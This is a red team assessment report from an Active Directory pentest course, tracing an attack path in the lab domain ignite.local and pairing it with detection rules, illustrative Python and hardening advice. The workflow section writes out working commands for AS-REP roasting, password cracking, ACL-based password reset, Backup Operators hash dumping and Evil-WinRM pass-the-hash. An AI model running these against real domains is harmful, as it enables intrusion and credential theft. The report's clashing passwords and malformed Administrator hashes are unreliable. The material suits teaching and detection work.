Active Directory Pentest Course-10

The Red Team Assessment Report for ignite.local revealed multiple vulnerabilities in the Active Directory environment, allowing for lateral movement and privilege escalation to achieve full Domain Administrator access. Key attack techniques included AS-REP Roasting, offline password cracking, and abuse of ACLs, leading to critical security gaps. Recommendations focus on enhancing identity and authentication practices, privilege management, and logging to improve overall security posture.

Uploaded by

Albano Mendez

Red Team Assessment Report


Target Domain: ignite.local

Assessment Type: Internal Red Team Engagement

Date: 17/06/2025

Conducted By: [Red Team Operator Name / Organization]



Executive Summary
This red team assessment simulated an internal threat actor targeting the Active Directory
environment of ignite.local. The engagement identified multiple weaknesses that enabled lateral
movement and privilege escalation, culminating in full Domain Administrator access: Kerberos
pre-authentication disabled on user accounts, weak password hygiene, excessive privileges (an
over-permissive ACL and Backup Operators membership), and ineffective monitoring.

Attack Path Overview


The red team chained the following techniques to reach domain dominance:

1. AS-REP Roasting retrieved AS-REP messages for accounts that do not require Kerberos
pre-authentication; the encrypted part of each response is keyed from the user's password and can
be cracked offline.
2. Offline Password Cracking of that material recovered valid user credentials (komal).
3. Active Directory Enumeration with BloodHound uncovered a misconfigured ACL on the user raj.
4. Abuse of the password-reset right on raj gave control of a second account.
5. Privilege Escalation via Backup Operators (raj's group membership) allowed extraction of the
Administrator account hash from the domain controller.
6. Remote Access as Domain Admin was achieved by passing that hash with Evil-WinRM.

Detailed Technical Workflow


Credential Access via AS-REP Roasting

impacket-GetNPUsers -dc-ip 192.168.1.53 ignite.local/ -usersfile users.txt -format john -outputfile hashes

users.txt is the list of candidate usernames. Accounts that still require pre-authentication answer
KDC_ERR_PREAUTH_REQUIRED and are skipped; the rest return an AS-REP whose encrypted part is written
to the file hashes in John the Ripper format.

Offline Password Cracking


john -w=/usr/share/wordlists/rockyou.txt hashes

Active Directory Enumeration


bloodhound-python -u komal -p Password@1 -ns 192.168.1.53 -d ignite.local -c All

BloodHound Attack Path Diagram

The BloodHound attack path diagram is generated from the following edges:
• User komal ➝ ACL abuse (ForceChangePassword) ➝ reset password of raj ➝ raj is a member of
Backup Operators ➝ dump hashes from the domain controller or move laterally ➝ Administrator
• User raj ➝ Administrator compromised via Evil-WinRM with the NTLM hash
It is visualized as a path graph:
• Start node: komal
• End node: Domain Admin
• Connected by edge types such as GenericAll, ForceChangePassword (BloodHound's name for the
password-reset right) and MemberOf.

Abuse of ACLs for Password Reset

bloodyAD --host 192.168.1.53 -d ignite.local -u komal -p yyyyyy123 set password raj xxxxxxx123
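Why that bloodyAD call succeeds, as an added example that is not part of the original report: an evaluator over a constructed DACL for the user raj that reports which access-control entries give komal a password-reset path. The access-mask bits and the User-Force-Change-Password right GUID are the real Active Directory values; the ACE list, the trustee names (SIDs in a real descriptor) and komal's group memberships are constructed for illustration. It goes slightly beyond the report's single case by also reporting the indirect WriteDacl and WriteOwner routes, where the attacker first grants the right to themself.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Access mask bits from ADS_RIGHTS_ENUM, as stored in AD security descriptors
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100  # "extended right"; which one is named by object_type
ADS_RIGHT_WRITE_DAC = 0x00040000
ADS_RIGHT_WRITE_OWNER = 0x00080000
ADS_RIGHT_GENERIC_ALL = 0x10000000
# Control access right that BloodHound displays as ForceChangePassword
USER_FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"


@dataclass
class Ace:
    trustee: str                        # principal the ACE applies to (a SID in reality)
    mask: int
    allow: bool = True
    object_type: Optional[str] = None   # GUID for object-specific ACEs; None applies to all


def rights_granted(ace: Ace) -> List[str]:
    """Translate one ACE into the BloodHound edge names that matter for a reset."""
    rights = []
    if ace.mask & ADS_RIGHT_GENERIC_ALL:
        rights.append("GenericAll")
    if ace.mask & ADS_RIGHT_DS_CONTROL_ACCESS:
        if ace.object_type is None:
            rights.append("AllExtendedRights")
        elif ace.object_type.lower() == USER_FORCE_CHANGE_PASSWORD:
            rights.append("ForceChangePassword")
    if ace.mask & ADS_RIGHT_WRITE_DAC:
        rights.append("WriteDacl")
    if ace.mask & ADS_RIGHT_WRITE_OWNER:
        rights.append("WriteOwner")
    return rights


DIRECT = {"GenericAll", "AllExtendedRights", "ForceChangePassword"}  # reset right now
INDIRECT = {"WriteDacl", "WriteOwner"}  # grant yourself the right first, then reset


def password_reset_paths(dacl: Iterable[Ace], principal_sids: Iterable[str]) -> Dict[str, List[str]]:
    """Walk a canonically ordered DACL (explicit denies precede allows) for the principal
    and every group it belongs to; return the direct and indirect reset rights that remain."""
    me = set(principal_sids)
    denied, allowed = set(), []
    for ace in dacl:
        if ace.trustee not in me:
            continue
        for right in rights_granted(ace):
            if not ace.allow:
                denied.add(right)
            elif right not in denied and right not in allowed:
                allowed.append(right)
    return {"direct": [r for r in allowed if r in DIRECT],
            "indirect": [r for r in allowed if r in INDIRECT]}


def bloodyad_command(paths: Dict[str, List[str]], host: str, domain: str, user: str, target: str) -> Optional[str]:
    """Emit the report's bloodyAD invocation only when a direct reset right exists."""
    if not paths["direct"]:
        return None
    return f"bloodyAD --host {host} -d {domain} -u {user} -p <password> set password {target} <newpassword>"


# Constructed DACL on the user object raj
RAJ_DACL = [
    Ace("Domain Admins", ADS_RIGHT_GENERIC_ALL),
    Ace("komal", ADS_RIGHT_DS_CONTROL_ACCESS, object_type=USER_FORCE_CHANGE_PASSWORD),  # the finding
    Ace("Helpdesk", ADS_RIGHT_DS_CONTROL_ACCESS, object_type=USER_FORCE_CHANGE_PASSWORD),
    Ace("Authenticated Users", 0x00020014),  # READ_CONTROL | read property | list: no reset path
]
KOMAL_GROUPS = ["komal", "Domain Users", "Authenticated Users"]

# Same DACL with an explicit deny in front of komal's allow, to show deny-first evaluation
# (the real remediation is to delete the allow ACE, not to pile a deny on top of it)
RAJ_DACL_DENIED = [Ace("komal", ADS_RIGHT_DS_CONTROL_ACCESS, allow=False,
                       object_type=USER_FORCE_CHANGE_PASSWORD)] + RAJ_DACL

if __name__ == "__main__":
    paths = password_reset_paths(RAJ_DACL, KOMAL_GROUPS)
    print(paths, bloodyad_command(paths, "192.168.1.53", "ignite.local", "komal", "raj"))
    print(password_reset_paths(RAJ_DACL_DENIED, KOMAL_GROUPS))
```

A real audit reads the nTSecurityDescriptor attribute over LDAP and resolves group membership recursively, which is exactly what the BloodHound collector did in the previous step; this block only shows the decision BloodHound makes per ACE when it draws the ForceChangePassword edge.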

Privilege Escalation through Backup Operators

nxc smb 192.168.1.53 -u raj -p xxxxxxx123 -M backup_operator

Membership of Backup Operators grants SeBackupPrivilege, which allows reading files and registry
hives regardless of their ACLs. The NetExec backup_operator module uses it to save the registry
hives from the domain controller, from which the DC machine account secret and then the domain's
NTDS hashes (including Administrator's) are recovered.

Domain Admin Access via Evil-WinRM

evil-winrm -i 192.168.1.53 -u administrator -H 32196b56ffe17b91a83bf38

MITRE ATT&CK Mappings

Technique                  ID          Description
Account Discovery          T1087.002   Enumerated domain users and groups (Domain Account)
AS-REP Roasting            T1558.004   Retrieved AS-REP encrypted material for offline cracking
Password Cracking          T1110.002   Used John the Ripper to recover plaintext credentials
Account Manipulation       T1098       Abused an ACL to reset another user's password
Valid Accounts             T1078.002   Used the recovered domain credentials to log in
OS Credential Dumping      T1003.003   Extracted the Administrator NTLM hash from NTDS
Remote Services (WinRM)    T1021.006   Used Evil-WinRM for remote execution as Administrator

Detection Opportunities

Activity                  Source                      Event ID / Artifact                          Detection Strategy
AS-REP Roasting           DC Security Logs            4768 with Pre-Authentication Type 0          Alert on AS-REQs without pre-auth, especially RC4 (0x17)
BloodHound Enumeration    LDAP / Directory Service    High LDAP query volume (1644), 4662          Alert on unusual LDAP enumeration patterns from workstations
Password Reset via ACL    DC Security Logs            4724 (4738 follows on the same target)       Detect non-admin subjects resetting other accounts' passwords
NTDS.dit / SYSTEM access  File and share auditing     4663, 5145, Sysmon Event 11 (FileCreate)     Monitor access to SAM, SYSTEM and NTDS.dit and copies of them
WinRM Sessions            Security / PowerShell logs  4624 type 3, 4688 wsmprovhost.exe, 4104      Alert on WinRM logons from unusual sources

Detection Engineering – MITRE Mapped

1. AS-REP Roasting Detection
Technique: Credential Access – T1558.004 – AS-REP Roasting
Data Source: Windows Security Logs (Domain Controllers)
Relevant Event ID: 4768 (A Kerberos authentication ticket (TGT) was requested)

Detection Logic:
AS-REP Roasting targets accounts that do not require Kerberos pre-authentication. Tools such as
GetNPUsers.py send an AS-REQ without pre-authentication data for each such account; the KDC answers
with an AS-REP whose encrypted part is keyed from the user's password and can therefore be cracked
offline. Every such request is logged on the domain controller as a 4768 with Pre-Authentication
Type 0.

Key Indicators:

• 4768 events with Pre-Authentication Type 0 (logon without pre-authentication)

• Ticket Encryption Type 0x17 (RC4-HMAC); the tooling asks for RC4 because it is the cheapest
type to crack

• Many such 4768 events from one client address in a short window, with no subsequent
service-ticket requests (4769) from that client, since the attacker only wants the AS-REP material

Example SIEM Rule (Sigma-style pseudo-query):

event.code: 4768 AND
winlog.event_data.PreAuthType: "0" AND
winlog.event_data.TicketEncryptionType: "0x17"

Mitigation/Detection Strategy:

• Alert on 4768 events for users with Do not require Kerberos pre-authentication enabled.

• Periodically audit Active Directory for accounts with the DONT_REQ_PREAUTH flag
(userAccountControl bit 0x400000).

• Implement anomaly detection for spikes in 4768 events with RC4 encryption from a single source.

2. Password Cracking (Offline)

Technique: Credential Access – T1110.002 – Brute Force: Password Cracking
Data Source: None on the target (offline attack)

Detection Logic:
Password cracking runs on attacker-controlled hardware and leaves no trace on the domain
controller. What can be monitored is the earlier acquisition of the credential material (the AS-REP
requests above) and the later first use of the recovered password (4624 or 4768 for the victim
account from a host it has never used).

Mitigation/Detection Strategy:

• Enforce a password policy that makes the passwords cracked in this engagement infeasible (length
and banned-password lists), since the hash format itself offers no protection.

• Monitor for internal password spraying and brute force (bursts of 4625 or 4771) from the same
hosts.

• Deploy honeytoken accounts with pre-authentication disabled and a long random password; any 4768
for such an account is a high-confidence alert.

3. Active Directory Enumeration (BloodHound)

Techniques:

• Discovery – T1087.002 – Account Discovery: Domain Account

• Discovery – T1069.002 – Permission Groups Discovery: Domain Groups

• Discovery – T1018 – Remote System Discovery

• Discovery – T1482 – Domain Trust Discovery

Data Source: Directory Service / LDAP logs, Security logs, network telemetry
Relevant Event IDs: 4662 (an operation was performed on an object), Directory Service 1644
(expensive or inefficient LDAP search; only logged once the 15 Field Engineering diagnostic level
is raised to 5 on the domain controllers)

Detection Logic:
BloodHound collectors (SharpHound, bloodhound-python) enumerate large sets of AD objects over LDAP
(users, groups, computers, ACLs, sessions, trusts) within minutes. A standard user account or
workstation pulling thousands of LDAP search results in that time is anomalous.

Key Indicators:

• Unusual LDAP search volume (Directory Service event 1644) from standard workstations

• Search requests returning very large result sets with broad filters (for example
(objectClass=*) at the domain root)

• Reads of sensitive attributes such as nTSecurityDescriptor and
msDS-AllowedToActOnBehalfOfOtherIdentity

Sigma-style Example:

event.code: 1644 AND
ldap.operation: "SearchRequest" AND
ldap.objectCount > 1000 AND
NOT source.user.name IN [<approved administrator and scanner accounts>]

The allow list must contain account names, not group names such as "Domain Admins", and it should
stay short: the collector in this engagement ran under an ordinary user account.

Mitigation/Detection Strategy:

• Enable LDAP search logging (Field Engineering level 5 with the Expensive and Inefficient Search
thresholds) and forward it to the SIEM.

• Monitor endpoints for SharpHound.exe, bloodhound-python, or similar binaries and for the
collector's ZIP output.
4. Account Manipulation via ACL Abuse

Technique: Persistence / Privilege Escalation – T1098 – Account Manipulation
Data Source: Security Logs (Domain Controllers)
Relevant Event IDs: 4724 (an attempt was made to reset an account's password), 4738 (a user
account was changed), 4723 (an attempt was made to change an account's password; a self-service
change, not a reset)

Detection Logic:
A principal holding GenericAll, AllExtendedRights or the User-Force-Change-Password control access
right (shown by BloodHound as ForceChangePassword) on another user can reset that user's password
without knowing the current one. The reset is recorded on the domain controller as 4724 with the
attacker as Subject and the victim as Target, normally followed by 4738 for the same target.

Key Indicators:

• 4724 where the Subject account is not a helpdesk or administrative account

• 4738 on the same target within seconds of the 4724

• A 4624 for the target account shortly afterwards from the same source as the Subject's recent
logons

SIEM Detection Example:

event.code: 4724 AND
NOT winlog.event_data.SubjectUserName IN ["Helpdesk", "ITAdmin"] AND
winlog.event_data.TargetUserName: "raj"

This rule is scoped to the account abused in the engagement; for production use drop the
TargetUserName clause or widen it to privileged and sensitive accounts.

Mitigation:

• Regularly audit ACL permissions using tools like BloodHound and remove ForceChangePassword and
GenericAll grants held by non-administrative principals.

• Alert on non-administrative users resetting passwords of other accounts.

5. Abuse of Backup Operators Group

Technique: Privilege Escalation – T1003.003 – OS Credential Dumping: NTDS (via SeBackupPrivilege)
Data Source: Security Logs, File and Registry Access Auditing
Relevant Event IDs: 4672, 4663, 5145, 4670

Detection Logic:
Members of Backup Operators hold SeBackupPrivilege, which lets them read any file or registry hive
regardless of its ACL, including the SAM, SYSTEM and SECURITY hives and, through a shadow copy,
NTDS.dit. On a domain controller this is equivalent to domain compromise: the hives yield the DC
machine account secret and NTDS.dit holds every domain hash.

Key Indicators:

• Membership changes to Backup Operators (4732, member added to a security-enabled local group;
Backup Operators is a built-in local group)

• 4672 logons that list SeBackupPrivilege for accounts that are not backup service accounts

• Access to C:\Windows\NTDS\ntds.dit, SAM or SYSTEM (4663 needs a SACL on those files; reads over
a share appear as 5145)

• Shadow copy creation commands (e.g., vssadmin, wbadmin, diskshadow) and reg save of HKLM\SAM,
HKLM\SYSTEM or HKLM\SECURITY

Example Detection Rule:

event.code: 4663 AND
winlog.event_data.ObjectName IN ["C:\\Windows\\NTDS\\ntds.dit",
"C:\\Windows\\System32\\config\\SAM", "C:\\Windows\\System32\\config\\SYSTEM"]

6. Remote Admin Access via Evil-WinRM

Technique: Lateral Movement – T1021.006 – Remote Services: Windows Remote Management
Data Source: Windows Security Logs, PowerShell Logs, Network Traffic
Relevant Event IDs: 4624, 4688, 4104

Detection Logic:
Evil-WinRM establishes WinRM sessions over TCP 5985 (HTTP) or 5986 (HTTPS). Invoked with -H it
authenticates by passing the NTLM hash, so the resulting logon is a network logon (type 3) with
authentication package NTLM rather than Kerberos. A network logon of the domain Administrator over
NTLM from a workstation the account has never used before is a red flag; the session also spawns
wsmprovhost.exe on the target.

Key Indicators:

• 4624 with Logon Type 3, Authentication Package NTLM and the administrator account, from a
non-administrative host

• 4688 process creation of wsmprovhost.exe and its child processes

• 4104 script block logging of the commands executed in the session

SIEM Rule Example:

event.code: 4624 AND
winlog.event_data.LogonType: "3" AND
winlog.event_data.AuthenticationPackageName: "NTLM" AND
winlog.event_data.TargetUserName: "administrator"

Mitigation:

• Limit WinRM to a management network or jump hosts and monitor for elevated access via NTLM.

• Require Kerberos for remote authentication where possible; restricting NTLM blocks the
pass-the-hash logon used here.
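The rules from sections 1, 4, 5 and 6 run over sample events, as an added example that is not part of the original report. The events are constructed in winlogbeat's shape (event ID plus the event_data fields the rules reference), in the order the engagement produced them, and are not collected from ignite.local; the helpdesk and backup-account allow lists and the host name are assumptions. The final step correlates hits by source address, which is how the roasting host and the later Administrator logon are tied together.

```python
from typing import Callable, Dict, List

Event = Dict[str, object]

# Assumed allow lists; in production these come from the identity team
HELPDESK_ACCOUNTS = {"helpdesk01", "itadmin"}
BACKUP_SERVICE_ACCOUNTS = {"svc_backup"}
SENSITIVE_FILES = {
    r"c:\windows\ntds\ntds.dit",
    r"c:\windows\system32\config\sam",
    r"c:\windows\system32\config\system",
    r"c:\windows\system32\config\security",
}


def field(ev: Event, key: str) -> str:
    return str(ev["event_data"].get(key, ""))


def asrep_roasting(ev: Event) -> bool:
    """Section 1: 4768 without pre-authentication and an RC4 ticket (T1558.004)."""
    return ev["event_id"] == 4768 and field(ev, "PreAuthType") == "0" and field(ev, "TicketEncryptionType") == "0x17"


def acl_password_reset(ev: Event) -> bool:
    """Section 4: password reset whose Subject is outside the helpdesk (T1098)."""
    return ev["event_id"] == 4724 and field(ev, "SubjectUserName").lower() not in HELPDESK_ACCOUNTS


def backup_privilege_logon(ev: Event) -> bool:
    """Section 5: SeBackupPrivilege assigned at logon to an account that is not a backup service."""
    return (ev["event_id"] == 4672 and "SeBackupPrivilege" in field(ev, "PrivilegeList")
            and field(ev, "SubjectUserName").lower() not in BACKUP_SERVICE_ACCOUNTS)


def sensitive_hive_access(ev: Event) -> bool:
    """Section 5: object access to NTDS.dit or a registry hive file (T1003.003); needs a SACL."""
    return ev["event_id"] == 4663 and field(ev, "ObjectName").lower() in SENSITIVE_FILES


def ntlm_admin_network_logon(ev: Event) -> bool:
    """Section 6: Evil-WinRM -H appears as a type-3 NTLM logon for administrator (T1021.006)."""
    return (ev["event_id"] == 4624 and field(ev, "LogonType") == "3"
            and field(ev, "AuthenticationPackageName") == "NTLM"
            and field(ev, "TargetUserName").lower() == "administrator")


RULES: Dict[str, Callable[[Event], bool]] = {
    "AS-REP Roasting (T1558.004)": asrep_roasting,
    "Password reset via ACL (T1098)": acl_password_reset,
    "SeBackupPrivilege logon": backup_privilege_logon,
    "NTDS/SAM hive access (T1003.003)": sensitive_hive_access,
    "NTLM network logon as administrator (T1021.006)": ntlm_admin_network_logon,
}


def run_rules(events: List[Event]) -> List[Dict[str, object]]:
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append({"rule": name, "event_id": ev["event_id"], "host": ev["host"],
                             "subject": field(ev, "SubjectUserName"), "target": field(ev, "TargetUserName"),
                             "source_ip": field(ev, "IpAddress").replace("::ffff:", "")})
    return hits


def hosts_with_multiple_stages(hits: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Correlate: a source address that trips more than one rule is the attacker's box."""
    by_ip: Dict[str, set] = {}
    for h in hits:
        if h["source_ip"]:
            by_ip.setdefault(str(h["source_ip"]), set()).add(str(h["rule"]))
    return {ip: sorted(rules) for ip, rules in by_ip.items() if len(rules) > 1}


# Constructed events (not from ignite.local), one per stage plus benign look-alikes
SAMPLE_EVENTS: List[Event] = [
    {"event_id": 4768, "host": "DC01", "event_data": {"TargetUserName": "komal", "PreAuthType": "0",
        "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.10", "Status": "0x0"}},
    {"event_id": 4768, "host": "DC01", "event_data": {"TargetUserName": "alice", "PreAuthType": "2",
        "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.1.20", "Status": "0x0"}},  # benign AES
    {"event_id": 4724, "host": "DC01", "event_data": {"SubjectUserName": "komal", "TargetUserName": "raj"}},
    {"event_id": 4724, "host": "DC01", "event_data": {"SubjectUserName": "helpdesk01", "TargetUserName": "bob"}},
    {"event_id": 4672, "host": "DC01", "event_data": {"SubjectUserName": "raj",
        "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"}},
    {"event_id": 4663, "host": "DC01", "event_data": {"SubjectUserName": "raj",
        "ObjectName": "C:\\Windows\\System32\\config\\SAM", "AccessMask": "0x1"}},
    {"event_id": 4624, "host": "DC01", "event_data": {"TargetUserName": "administrator", "LogonType": "3",
        "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.1.10"}},
    {"event_id": 4624, "host": "DC01", "event_data": {"TargetUserName": "administrator", "LogonType": "3",
        "AuthenticationPackageName": "Kerberos", "IpAddress": "192.168.1.5"}},  # jump host, Kerberos
]

if __name__ == "__main__":
    for hit in run_rules(SAMPLE_EVENTS):
        print(hit)
    print(hosts_with_multiple_stages(run_rules(SAMPLE_EVENTS)))
```

Each rule is deliberately narrow; the value comes from the correlation, because a single 4724 or a single NTLM logon has benign explanations while one workstation performing AS-REP requests and later logging on as Administrator does not.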


Recommendations
Identity & Authentication
- Enforce Kerberos pre-authentication for all user accounts (clear DONT_REQ_PREAUTH).
- Review and apply strong password policies; the cracked passwords in this engagement fell to a
public wordlist.
- Implement MFA for administrative accounts wherever feasible.

Privilege Management
- Audit and limit delegated permissions (ForceChangePassword, GenericAll, WriteDacl) using tools
like BloodHound.
- Remove users from the Backup Operators group unless strictly required; on domain controllers its
membership is equivalent to Domain Admin.

Logging & Monitoring

- Enable detailed auditing for Kerberos (4768/4769), LDAP queries, PowerShell execution, and
remote logons.
- Integrate logs with a SIEM for behavioral analytics and the correlations described above.

Infrastructure Hardening
- Implement Local Administrator Password Solution (LAPS).
- Restrict and monitor usage of WinRM and other remote management interfaces; prefer Kerberos and
restrict NTLM to block pass-the-hash.
- Regularly review group memberships and ACLs using automated tools.

Appendix
Cracked User Credentials:
- komal : Password
- raj : Password

Administrator NTLM Hash:
32196b56ffe6f45e29888889

Conclusion
This assessment successfully demonstrated how a combination of weak authentication settings, over-
permissive ACLs, and poor privilege management could lead to a complete Active Directory domain
compromise. The issues discovered highlight critical gaps in hardening and monitoring practices that
must be addressed to improve the organization's overall security posture.
www.ignitetechnologies.in
